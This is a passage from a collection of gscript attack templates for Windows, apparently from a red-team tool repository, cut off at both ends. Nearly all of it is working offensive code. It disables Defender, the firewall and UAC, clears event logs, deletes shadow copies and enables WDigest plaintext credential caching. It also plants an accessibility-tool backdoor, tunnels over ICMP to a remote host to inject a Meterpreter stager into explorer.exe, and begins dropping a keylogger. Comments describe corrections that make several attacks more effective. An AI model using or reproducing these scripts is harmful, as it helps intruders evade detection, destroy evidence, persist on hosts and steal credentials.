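    console.error("Error writing file: " + errchk.Error());
    DebugConsole();
    return false;
  }

  console.log("Creating new service object...");
  var svcObj = svc.NewFromJSON(serviceSettings);
  if (svcObj[1] != null) {
    console.error("Error creating service: " + svcObj[1].Error());
    DebugConsole();
    return false;
  }

  console.log("Checking service config sanity...");
  var confchk = svcObj[0].CheckConfig(true);
  if (confchk[1] != null) {
    console.error("Error checking config: " + confchk[1].Error());
    DebugConsole();
    return false;
  }
  if (confchk[0] === false) {
    console.error("Service config check failed without an error value");
    DebugConsole();
    return false;
  }

  console.log("Installing service...");
  var installchk = svcObj[0].Install(true);
  if (installchk != null) {
    console.error("Error installing service: " + installchk.Error());
    DebugConsole();
    return false;
  }

  console.log("Starting service...");
  var startchk = svcObj[0].Start();
  if (startchk != null) {
    console.error("Error starting service: " + startchk.Error());
    DebugConsole();
    return false;
  }

  console.log("Done gscript x/svc persistence example");
  return true;
}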
75 |
76 |
--------------------------------------------------------------------------------
/attack/windows/Vyrus-Demo/epicMsf.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
// Title: Disable Defender, ICMP tunnel, Meterpreter injection into explorer.exe
// Author: Vyrus
// Purpose:
// -Check if Windows Defender real-time protection is running
// -If it is, disable it (and re-enable it at the end)
// -Drop / run ICMP tunnel
// -Download stageless meterpreter payload via HTTPS / ICMP
// -Inject meterpreter into explorer.exe
10 | // Gscript version: 1.0.0
11 |
12 | //go_import:github.com/gen0cide/gscript/x/windows as windows
13 | //import:ptunnel.exe
14 | //import:cygwin1.dll
15 | //import:payload
16 |
// Drop locations for the ICMP tunnel client and the cygwin runtime it
// needs. The fixed, conspicuous file name is an easy indicator.
var ptun = "C:\\Windows\\Temp\\doNotDeleteMe.exe";
var cygdll = "C:\\Windows\\Temp\\cygwin1.dll";
// ptunnel proxy reached over ICMP, and the TCP port on the proxy side the
// tunnel is forwarded to.
var ptunHost = "192.168.0.21";
var ptunPort = "4444";
21 |
// checkErr inspects a synchronous ExecuteCommand result, where index 3 holds
// the exit status and indices 1/2 the captured output. A non-zero status is
// logged, drops into DebugConsole() and yields true; otherwise false.
function checkErr(err) {
  // loose comparison kept on purpose: the status may arrive as a string
  var failed = err[3] != 0;
  if (!failed) {
    return false;
  }
  console.log(err[1]);
  console.log(err[2]);
  DebugConsole();
  return true;
}
31 |
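// checkErrAsyncCmd inspects an ExecuteCommandAsync result ([cmd, err]).
// Returns true when err is set (after logging it), false otherwise.
// The original never returned a value, so the caller's
// `if (checkErrAsyncCmd(...)) return false;` could never fire and a failed
// tunnel spawn went unnoticed.
function checkErrAsyncCmd(err) {
  // `!= undefined` also matches null, which is what a nil Go error may map to
  if (err[1] != undefined) {
    console.log(err[1]);
    return true;
  }
  return false;
}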
37 |
// checkErrString treats any truthy value as an error: it is logged and true
// is returned; falsy values (undefined, null, "") yield false.
function checkErrString(err) {
  var isErr = Boolean(err);
  if (isErr) {
    console.log(err);
  }
  return isErr;
}
45 |
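// Deploy: disable the host firewall, turn off Defender real-time protection
// if it was on, drop and start the ptunnel ICMP client, inject the embedded
// payload into explorer.exe, then restore real-time protection.
// Returns false at the first failing step, true otherwise (the original fell
// off the end and returned undefined).
// Caveats: the firewall is never turned back on; Tamper Protection, where
// enabled, is expected to block Set-MpPreference silently; every step here
// needs an elevated context.
function Deploy() {
  // turn off firewall
  console.log("Starting Disable Windows Firewall");
  var cmdResult = G.exec.ExecuteCommand("netsh", ["advfirewall", "set", "allprofiles", "state", "off"]);
  if (checkErr(cmdResult)) return false;
  console.log("Done Disable Windows Firewall");

  // check if defender real-time protection is on. The cmdlet is
  // Get-MpComputerStatus; the bare "MpComputerStatus" of the original is not
  // a recognised command and fails the exit-code check.
  var wasDefenderOnWhenWeStarted = false;
  cmdResult = G.exec.ExecuteCommand("powershell.exe", ["Get-MpComputerStatus"]);
  if (checkErr(cmdResult)) return false;
  var cmdLines = cmdResult[1].split('\n');
  for (var i = 0; i < cmdLines.length; i++) {
    if (cmdLines[i].indexOf("RealTimeProtectionEnabled") !== -1 &&
        cmdLines[i].indexOf("True") !== -1) {
      wasDefenderOnWhenWeStarted = true;
    }
  }

  // turn defender off (admin required)
  if (wasDefenderOnWhenWeStarted) {
    cmdResult = G.exec.ExecuteCommand("powershell.exe", ["Set-MpPreference -DisableRealtimeMonitoring $true"]);
    if (checkErr(cmdResult)) return false;
  }

  // drop ptun and its cygwin runtime; GetAssetAsBytes returns [bytes, err]
  console.log("Dropping the icmp tunnel binary...");
  var ptunAsset = GetAssetAsBytes("ptunnel.exe");
  if (checkErrString(ptunAsset[1])) return false;
  if (checkErrString(G.file.WriteFileFromBytes(ptun, ptunAsset[0]))) return false;

  console.log("Dropping the icmp tunnel DLL...");
  var cygAsset = GetAssetAsBytes("cygwin1.dll");
  if (checkErrString(cygAsset[1])) return false;
  if (checkErrString(G.file.WriteFileFromBytes(cygdll, cygAsset[0]))) return false;

  // run ptun: local 31337 -> ICMP proxy ptunHost -> 127.0.0.1:ptunPort on the proxy
  console.log("Starting icmp tunnel...");
  var asyncResult = G.exec.ExecuteCommandAsync(ptun, ["-p", ptunHost, "-lp", "31337", "-da", "127.0.0.1", "-dp", ptunPort]);
  if (checkErrAsyncCmd(asyncResult)) return false;

  // get PID of explorer.exe. Get-Process prints one id per line when more
  // than one explorer.exe exists, and Number() of that is NaN; take the
  // first token only.
  console.log("Looking up explorer.exe PID...");
  cmdResult = G.exec.ExecuteCommand("powershell.exe", ["Get-Process explorer | select -expand id"]);
  if (checkErr(cmdResult)) return false;
  var pidText = cmdResult[1].replace(/^\s+|\s+$/g, "").split(/\s+/)[0];
  var pid = Number(pidText);
  if (pidText === "" || isNaN(pid)) {
    console.log("Could not parse explorer.exe PID from: " + cmdResult[1]);
    return false;
  }
  console.log("PID found!: " + pid);

  // inject meterpreter
  console.log("Injecting msf shellcode stager into explorer.exe...");
  var payload = GetAssetAsBytes("payload");
  if (checkErrString(payload[1])) return false;
  if (checkErrString(windows.InjectShellcode(pid, payload[0]))) return false;

  // turn defender back on
  if (wasDefenderOnWhenWeStarted) {
    cmdResult = G.exec.ExecuteCommand("powershell.exe", ["Set-MpPreference -DisableRealtimeMonitoring $false"]);
    if (checkErr(cmdResult)) return false;
  }
  return true;
}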
103 |
--------------------------------------------------------------------------------
/attack/windows/delete_event_logs.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete Event Logs
3 | // Author: ahhh
4 | // Purpose: Deletes a number of critical security event logs on a Windows machine
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1070
7 |
8 | //priority:150
9 | //timeout:150
10 |
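// Deploy clears the Security, Application, System, Windows PowerShell and
// Sysmon event logs. Each ExecuteCommandAsync result is [cmd, err] where
// err only covers a failed spawn, not a failing command; the exit status is
// not observed, so "Cleared Event Logs" is a statement of intent.
// Detection note: clearing Security itself writes Security 1102 (System:
// 104), which this script cannot suppress.
function Deploy() {
  console.log("starting execution of Delete Event Logs");
  // powershell.exe joins the argv after the cmdlet name into one command line,
  // so "Security, Application, System" is parsed as a three-element array.
  var clear1 = G.exec.ExecuteCommandAsync("powershell.exe", ["Clear-EventLog", "Security, Application, System"]);
  console.log("errors: "+clear1[1]);
  // The classic log is a single log named "Windows PowerShell"; the original
  // "Windows, PowerShell" asked for two logs that do not exist.
  var clear2 = G.exec.ExecuteCommandAsync("powershell.exe", ["Clear-EventLog", "-LogName", "'Windows PowerShell'"]);
  console.log("errors: "+clear2[1]);
  // Sysmon logs to the ETW channel Microsoft-Windows-Sysmon/Operational, which
  // Clear-EventLog (classic log API) cannot clear; wevtutil can.
  var clear3 = G.exec.ExecuteCommandAsync("wevtutil.exe", ["cl", "Microsoft-Windows-Sysmon/Operational"]);
  console.log("errors: "+clear3[1]);
  console.log("Cleared Event Logs");
  return true;
}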
--------------------------------------------------------------------------------
/attack/windows/delete_volume_shadow_copy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete Volume Shadow Copy
3 | // Author: ahhh
4 | // Purpose: Deletes the volume shadow copy with both wmic and vssadmin
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1107
7 |
8 | //priority:100
9 | //timeout:150
10 |
var fn; // declared but never referenced in this script; template leftover
12 |
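// Deploy removes volume shadow copies of C: twice over: vssadmin deletes the
// oldest copy (/oldest, as in the original; /all would remove every one),
// wmic then deletes all remaining shadow copies. Both run asynchronously and
// need an elevated context; the [cmd, err] result's err only reports a
// failed spawn, so the "Deleted ..." messages are not confirmation.
// The original discarded even the spawn error.
function Deploy() {
  console.log("starting execution of Delete Volume Shadow Copy");
  var vss = G.exec.ExecuteCommandAsync("vssadmin.exe", ["delete", "shadows", "/for=c:", "/oldest", "/quiet"]);
  if (vss[1] != null) {
    console.log("errors: "+vss[1]);
  } else {
    console.log("Deleted the volume shadow copy with the vssadmin tool");
  }

  var wmic = G.exec.ExecuteCommandAsync("wmic.exe", ["shadowcopy", "delete", "/nointeractive"]);
  if (wmic[1] != null) {
    console.log("errors: "+wmic[1]);
  } else {
    console.log("Deleted the volume shadow copy with wmic");
  }
  console.log("done Deleting VSC");
  return true;
}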
25 |
--------------------------------------------------------------------------------
/attack/windows/disable_adminApprovalMode.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Admin Approval Mode
3 | // Author: ahhh
4 | // Purpose: This will disable the admin approval mode
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:100
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
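// Deploy disables Admin Approval Mode for the built-in Administrator account
// by setting HKLM\...\Policies\System\FilterAdministratorToken to 0.
// The original wrote 1, which is the value that *enables* Admin Approval
// Mode for that account (the policy "Admin Approval Mode for the Built-in
// Administrator account": 1 = Enabled, 0 = Disabled, the default), i.e. it
// hardened the host instead of weakening it. Needs administrative rights;
// AddRegKeyDWORD's return value is not checked because its shape is not
// visible here.
function Deploy() {
  console.log("Starting Disable Admin Approval Mode");

  var value = 0;
  windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "FilterAdministratorToken", value);

  console.log("Done Disable Admin Approval Mode");
  return true;
}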
23 |
--------------------------------------------------------------------------------
/attack/windows/disable_defender.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Windows Defender
3 | // Author: ahhh
4 | // Purpose: This will disable some features of windows defender, such as anti-spyware, behavior monitoring, on access protection, and real time scanning
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:91
9 | //timeout:160
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
// Deploy writes the Windows Defender policy values that switch off
// anti-spyware, behaviour monitoring, on-access protection and the scan that
// runs when real-time protection is re-enabled. Requires write access to
// HKLM\SOFTWARE\Policies; on builds with Tamper Protection enabled these
// policy keys are expected to be ignored. Always returns true, the
// registry calls' results are not inspected.
function Deploy() {
  console.log("Starting Disable Windows Defender");

  var policyRoot = "SOFTWARE\\Policies\\Microsoft\\Windows Defender";
  var rtp = policyRoot + "\\Real-Time Protection";
  // [subkey, value name] pairs, each set to DWORD 1 in this order
  var disables = [
    [policyRoot, "DisableAntiSpyware"],
    [rtp, "DisableBehaviorMonitoring"],
    [rtp, "DisableOnAccessProtection"],
    [rtp, "DisableScanOnRealtimeEnable"]
  ];
  for (var i = 0; i < disables.length; i++) {
    windows.AddRegKeyDWORD("LOCAL_MACHINE", disables[i][0], disables[i][1], 1);
  }

  console.log("Done Disable Windows Defender");
  return true;
}
26 |
27 |
28 |
--------------------------------------------------------------------------------
/attack/windows/disable_localAdminFilter.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Local Admin Filter
3 | // Author: ahhh
4 | // Purpose: This will disable the local admin filter
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1089
7 |
8 | //priority:999
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
// Deploy sets LocalAccountTokenFilterPolicy=1 under
// HKLM\...\Policies\System, which turns off the remote UAC token filter so
// that local administrator accounts get a full token over the network
// (e.g. for admin shares / remote execution with local credentials).
// Needs administrative rights; the registry call's result is not checked.
function Deploy() {
  console.log("Starting Disable Local Admin Filter");

  var policyKey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System";
  var enabled = 1;
  windows.AddRegKeyDWORD("LOCAL_MACHINE", policyKey, "LocalAccountTokenFilterPolicy", enabled);

  console.log("Done Disable Local Admin Filter");
  return true;
}
23 |
--------------------------------------------------------------------------------
/attack/windows/disable_securityCenter.gs:
--------------------------------------------------------------------------------
1 |
2 |
3 | // Example gscript template
4 | // Title: Disable Security Center
5 | // Author: ahhh
6 | // Purpose: This will disable security center notifications
7 | // Gscript version: 1.0.0
8 | // ATT&CK:
9 | // Note: requires restart
10 |
11 | //priority:99
12 | //timeout:160
13 |
14 | //go_import:github.com/gen0cide/gscript/x/windows as windows
15 |
// Deploy sets the SecurityHealthService start type to 4 (SERVICE_DISABLED),
// which stops the Security Center / Windows Security notifications after the
// next reboot (see the header Note). Needs administrative rights; the
// registry call's result is not checked.
function Deploy() {
  console.log("Starting Disable Security Center");

  var SERVICE_DISABLED = 4;
  var svcKey = "SYSTEM\\CurrentControlSet\\Services\\SecurityHealthService";
  windows.AddRegKeyDWORD("LOCAL_MACHINE", svcKey, "Start", SERVICE_DISABLED);

  console.log("Done Disable Security Center");
  return true;
}
--------------------------------------------------------------------------------
/attack/windows/disable_uac.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable UAC
3 | // Author: ahhh
4 | // Purpose: Disable UAC
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1088
7 |
8 | //priority:92
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
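// Deploy disables UAC by setting EnableLUA=0 under
// HKLM\...\Policies\System; the change takes effect after a reboot.
// The original wrote a value named "DisableUAC", which is not a value
// Windows reads, and wrote 0 to it, so nothing changed. The documented
// policy value is EnableLUA (1 = UAC on, 0 = off). Needs administrative
// rights; the registry call's result is not checked.
function Deploy() {
  console.log("Starting Disable UAC");

  var value = 0;
  // disable UAC (EnableLUA=0; requires a reboot to apply)
  windows.AddRegKeyDWORD("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "EnableLUA", value);

  console.log("Done Disable UAC");
  return true;
}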
23 |
--------------------------------------------------------------------------------
/attack/windows/disable_winUpdates.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable winUpdates
3 | // Author: ahhh
4 | // Purpose: Disables a bunch of windows updates
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:96
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
// Deploy writes a set of policy values meant to keep Windows Update from
// reaching Microsoft: access to WU is denied for the machine and the current
// user, automatic updates are set to "never check" (AUOptions=1), and the
// client is pointed at a WSUS server on 127.0.0.1 that does not exist.
// NOTE(review): the first path, HKLM\SYSTEM\Internet Communication
// Management\..., does not look like a location Windows reads for this
// policy; left as in the original, verify before relying on it.
// Needs administrative rights for the HKLM writes; results are not checked.
function Deploy() {
  console.log("Starting Disable WinUpdates");

  var on = 1;
  var bogusWsus = "http://127.0.0.1";
  var au = "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU";

  // [hive, subkey, value name] triples, each set to DWORD 1 in this order
  var dwords = [
    ["LOCAL_MACHINE", "SYSTEM\\Internet Communication Management\\Internet Communication", "DisableWindowsUpdateAccess"],
    ["CURRENT_USER", "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WindowsUpdate", "DisableWindowsUpdateAccess"],
    ["CURRENT_USER", "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", "NoWindowsUpdate"],
    ["LOCAL_MACHINE", au, "UseWUServer"],
    ["LOCAL_MACHINE", au, "AUOptions"]
  ];
  for (var i = 0; i < dwords.length; i++) {
    windows.AddRegKeyDWORD(dwords[i][0], dwords[i][1], dwords[i][2], on);
  }
  // both WSUS endpoints point at the unreachable local address
  windows.AddRegKeyString("LOCAL_MACHINE", au, "WUServer", bogusWsus);
  windows.AddRegKeyString("LOCAL_MACHINE", au, "WUStatusServer", bogusWsus);

  console.log("Done Disable WinUpdates");
  return true;
}
30 |
--------------------------------------------------------------------------------
/attack/windows/disable_windows_firewall.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Windows Firewall
3 | // Author: ahhh
4 | // Purpose: Drops the windows firewall by turning it off.
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1089
7 |
8 | //priority:150
9 | //timeout:150
10 |
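// Deploy turns the Windows firewall off for all profiles via netsh.
// Returns false when netsh reports a non-zero exit status (e.g. run without
// administrative rights); the original discarded the result and reported
// success unconditionally.
function Deploy() {
  console.log("Starting Disable Windows Firewall");
  var res = G.exec.ExecuteCommand("netsh", ["advfirewall", "set", "allprofiles", "state", "off"]);
  // ExecuteCommand appears to return [cmd, stdout, stderr, exitcode] (the
  // layout the checkErr helper elsewhere in this repo reads). The check is
  // guarded so an unexpected shape does not turn into a false failure.
  if (res != null && res[3] != null && res[3] != 0) {
    console.log("errors: netsh exited " + res[3] + ": " + res[2]);
    return false;
  }
  console.log("Done Disable Windows Firewall");
  return true;
}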
--------------------------------------------------------------------------------
/attack/windows/enable_adminShares.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Enable Admin Shares
3 | // Author: ahhh
4 | // Purpose: This will Enable Admin Shares
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1077
7 |
8 | //priority:97
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
// Deploy re-enables the administrative shares (C$, ADMIN$, ...) by setting
// AutoShareServer and AutoShareWks to 1 under the LanmanServer parameters;
// the Server service re-creates them on its next start. Needs administrative
// rights; the registry calls' results are not checked.
function Deploy() {
  console.log("Starting Enable Admin Shares");

  var lanman = "SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters";
  var autoShare = ["AutoShareServer", "AutoShareWks"];
  for (var i = 0; i < autoShare.length; i++) {
    windows.AddRegKeyDWORD("LOCAL_MACHINE", lanman, autoShare[i], 1);
  }

  console.log("Done Enable Admin Shares");
  return true;
}
25 |
--------------------------------------------------------------------------------
/attack/windows/enable_installElevated.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Always Install Elevated
3 | // Author: ahhh
4 | // Purpose: Always Install Elevated
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:98
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
// Deploy sets AlwaysInstallElevated=1 in both HKCU and HKLM (the policy only
// takes effect when both are set), after which any MSI the user runs is
// installed with SYSTEM privileges. Needs administrative rights for the
// HKLM write; the registry calls' results are not checked.
function Deploy() {
  console.log("Starting Install Elevated");

  var installerPolicy = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer";
  var hives = ["CURRENT_USER", "LOCAL_MACHINE"];
  for (var i = 0; i < hives.length; i++) {
    windows.AddRegKeyDWORD(hives[i], installerPolicy, "AlwaysInstallElevated", 1);
  }

  console.log("Done Install Elevated");
  return true;
}
23 |
--------------------------------------------------------------------------------
/attack/windows/enable_rdp.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Enable RDP
3 | // Author: ahhh
4 | // Purpose: Enable RDP
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:98
9 | //timeout:150
10 |
11 | //go_import:github.com/ahhh/winsvc as winsvc
12 |
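// Deploy enables Remote Desktop: it clears fDenyTSConnections (the default
// 1 refuses RDP sessions even when TermService is running), opens the
// built-in "Remote Desktop" firewall rule group, then starts TermService.
// The original only started the service, which on a default install leaves
// RDP still refusing connections. Needs administrative rights; reg/netsh
// exit statuses are logged when they look non-zero, StartService's return
// value is not inspected because its shape is not visible here.
function Deploy() {
  console.log("Starting Enable RDP");

  // allow Remote Desktop connections
  var regRes = G.exec.ExecuteCommand("reg.exe", ["add", "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server", "/v", "fDenyTSConnections", "/t", "REG_DWORD", "/d", "0", "/f"]);
  if (regRes != null && regRes[3] != null && regRes[3] != 0) {
    console.log("errors: reg.exe exited " + regRes[3] + ": " + regRes[2]);
  }

  // open inbound 3389: the RDP rule group is referenced by its resource id
  // so the call does not depend on the display language or on quoting
  var fwRes = G.exec.ExecuteCommand("netsh", ["advfirewall", "firewall", "set", "rule", "group=@FirewallAPI.dll,-28752", "new", "enable=Yes"]);
  if (fwRes != null && fwRes[3] != null && fwRes[3] != 0) {
    console.log("errors: netsh exited " + fwRes[3] + ": " + fwRes[2]);
  }

  winsvc.StartService("TermService");

  console.log("Done Enable RDP");
  return true;
}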
21 |
22 |
--------------------------------------------------------------------------------
/attack/windows/enable_smbv1.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Enable SMBv1
3 | // Author: ahhh
4 | // Purpose: Enable SMBv1
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:95
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
// Deploy sets SMB1=1 under the LanmanServer parameters so the server side
// of SMBv1 is enabled. This only matters where the SMB1 feature is still
// installed; on builds that removed it (Windows 10 1709 and later by
// default) the optional feature has to be added first. Needs administrative
// rights; the registry call's result is not checked.
function Deploy() {
  console.log("Starting Enable SMBv1");

  var lanman = "SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters";
  var enabled = 1;
  windows.AddRegKeyDWORD("LOCAL_MACHINE", lanman, "SMB1", enabled);

  console.log("Done Enable SMBv1");
  return true;
}
22 |
--------------------------------------------------------------------------------
/attack/windows/enable_stickykeys.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Enable Sticky Keys
3 | // Author: ahhh
// Purpose: Points the Image File Execution Options debugger of sethc.exe and other accessibility binaries at a dropped backdoor binary
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1015
7 |
8 | //priority:110
9 | //timeout:150
10 |
//go_import:os as os
//go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
13 | //import:/private/tmp/example.exe
14 |
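// Deploy drops the embedded example.exe under the temp directory with a
// random name and registers it as the IFEO "Debugger" for sethc.exe,
// Utilman.exe, DisplaySwitch.exe, Magnifier.exe, OSK.exe and Narrator.exe,
// so launching any of the accessibility tools (also from the logon screen,
// as SYSTEM) runs the dropped binary instead.
// Returns false when the asset or the file write fails; the original logged
// and continued, and left `errors` as an implicit global.
// The script calls os.TempDir(), so `os` must be brought in with
// //go_import:os as os in the header, as the sibling scripts do.
function Deploy() {
  console.log("Starting Enable Sticky Keys");

  // Prep the sample; GetAssetAsBytes returns [bytes, err]
  var example = GetAssetAsBytes("example.exe");
  if (example[1] != null) {
    console.log("errors: "+example[1].Error());
    return false;
  }
  var temppath = os.TempDir();
  var naming = G.rand.GetAlphaString(5).toLowerCase();
  var fullpath = temppath+"\\"+naming+".exe";

  // Drop the sample
  console.log("file name: "+ fullpath);
  var writeErr = G.file.WriteFileFromBytes(fullpath, example[0]);
  if (writeErr != null) {
    console.log("errors: "+writeErr);
    return false;
  }

  // IFEO: Windows launches the "Debugger" value with the original image as
  // its argument whenever one of these executables is started.
  var ifeo = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\";
  var targets = ["sethc.exe", "Utilman.exe", "DisplaySwitch.exe", "Magnifier.exe", "OSK.exe", "Narrator.exe"];
  for (var i = 0; i < targets.length; i++) {
    windows.AddRegKeyString("LOCAL_MACHINE", ifeo + targets[i], "Debugger", fullpath);
  }

  console.log("Done Enable Sticky Keys");
  return true;
}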
40 |
--------------------------------------------------------------------------------
/attack/windows/enable_wdigest_credcache.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Enable WDigest Credential Cache
3 | // Author: ahhh
4 | // Purpose: Enable WDigest Credential Cache
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:99
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
// Deploy sets UseLogonCredential=1 for the WDigest security provider, which
// makes LSASS keep plaintext credentials for logons that happen after the
// change (existing sessions are not affected; Credential Guard, where
// enabled, prevents it). Needs administrative rights; the registry call's
// result is not checked.
function Deploy() {
  console.log("Starting Enable WDigest Credential Cache");

  var wdigest = "SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest";
  var enabled = 1;
  windows.AddRegKeyDWORD("LOCAL_MACHINE", wdigest, "UseLogonCredential", enabled);

  console.log("Done Enable WDigest Credential Cache");
  return true;
}
22 |
--------------------------------------------------------------------------------
/attack/windows/enable_winrm.gs:
--------------------------------------------------------------------------------
1 | // Example Enable WinRM
2 | // Title: Enable WinRM
3 | // Author: ahhh
4 | // Purpose: Enable WinRM
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:98
9 | //timeout:190
10 |
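// Deploy enables PowerShell remoting / the WinRM listener in four PowerShell
// steps (Enable-PSRemoting, winrm quickconfig, TrustedHosts=*, service
// restart). powershell.exe joins the argv after -c into one command line,
// which the original already relied on. Needs administrative rights.
// Fix: the original literal "wsman:\localhost\client\trustedhosts *" lost
// its backslashes to JavaScript escapes (\l and \c vanish, \t became a TAB),
// so Set-Item never received a valid path. Note that TrustedHosts is a
// *client* setting (which remote hosts this box will authenticate to); it is
// not required for accepting inbound WinRM sessions.
// Each step's exit status (index 3 of the ExecuteCommand result, as the
// checkErr helper elsewhere in this repo reads it) is logged when non-zero;
// the function still returns true, as before.
function Deploy() {
  console.log("Starting Enable WinRM");

  var steps = [
    ["-ExecutionPolicy", "bypass", "-c", "Enable-PSRemoting", "-force"],
    ["-ExecutionPolicy", "bypass", "-c", "winrm", "quickconfig", "-quiet"],
    ["-ExecutionPolicy", "bypass", "-c", "Set-Item", "-force", "wsman:\\localhost\\client\\trustedhosts *"],
    ["-ExecutionPolicy", "bypass", "-c", "restart-service", "-force", "WinRM"]
  ];
  for (var i = 0; i < steps.length; i++) {
    var res = G.exec.ExecuteCommand("powershell", steps[i]);
    if (res != null && res[3] != null && res[3] != 0) {
      console.log("errors: step " + i + " exited " + res[3] + ": " + res[2]);
    }
  }

  console.log("Done Enable WinRM");
  return true;
}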
22 |
--------------------------------------------------------------------------------
/attack/windows/force_hidden_files.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Force Hidden Files
3 | // Author: ahhh
4 | // Purpose: Forces Hidden Files on Windows
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1158#Windows
7 |
8 | //priority:105
9 | //timeout:150
10 |
11 | //go_import:github.com/gen0cide/gscript/x/windows as windows
12 |
// Deploy tampers with Explorer's "Hidden files" option: the CheckedValue and
// DefaultValue of the NOHIDDEN, SHOWALL and SuperHidden radio entries under
// HKLM\...\Explorer\Advanced\Folder\Hidden are all set to 0, and the
// NoFolderOptions policy is set so the Folder Options dialog is hidden from
// the user. NOTE(review): the per-user Hidden/ShowSuperHidden values under
// HKCU are not touched, so what a user currently sees is not changed by this
// script alone. Needs administrative rights; results are not checked.
function Deploy() {
  console.log("Starting Force Hidden Files");

  var hiddenRoot = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\";
  var radios = ["NOHIDDEN", "SHOWALL", "SuperHidden"];
  var fields = ["CheckedValue", "DefaultValue"];
  // same write order as before: per radio entry, CheckedValue then DefaultValue
  for (var r = 0; r < radios.length; r++) {
    for (var f = 0; f < fields.length; f++) {
      windows.AddRegKeyDWORD("LOCAL_MACHINE", hiddenRoot + radios[r], fields[f], 0);
    }
  }
  // remove the Folder Options entry so the setting cannot be flipped back via the UI
  windows.AddRegKeyDWORD("LOCAL_MACHINE", "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", "NoFolderOptions", 1);

  console.log("Done Force Hidden Files");
  return true;
}
30 |
31 |
--------------------------------------------------------------------------------
/attack/windows/keylog_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Keylog Spy
3 | // Author: ahhh
4 | // Purpose: keylogger!
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1056
7 | // Using ShyGuy:
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/ShyGuy_x64.dll
12 | //go_import:os as os
13 |
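// Deploy drops the embedded keylogger DLL (asset "ShyGuy_x64.dll") under the
// temp directory with a random name and loads it via
// rundll32.exe <path>,dllmain in the background.
// Returns false when the asset, the write or the spawn fails; the original
// logged and carried on, and left `errors` as an implicit global.
// Fix: the original built the path as TempDir()+name with no separator,
// so on Windows the file landed next to the temp directory as
// "...\Tempxxxx.dll" rather than inside it.
function Deploy() {
  console.log("Starting Keylog");

  // Prep the sample; GetAssetAsBytes returns [bytes, err]
  var spy = GetAssetAsBytes("ShyGuy_x64.dll");
  if (spy[1] != null) {
    console.log("errors: "+spy[1].Error());
    return false;
  }
  // Temp file path with a 4-letter random name
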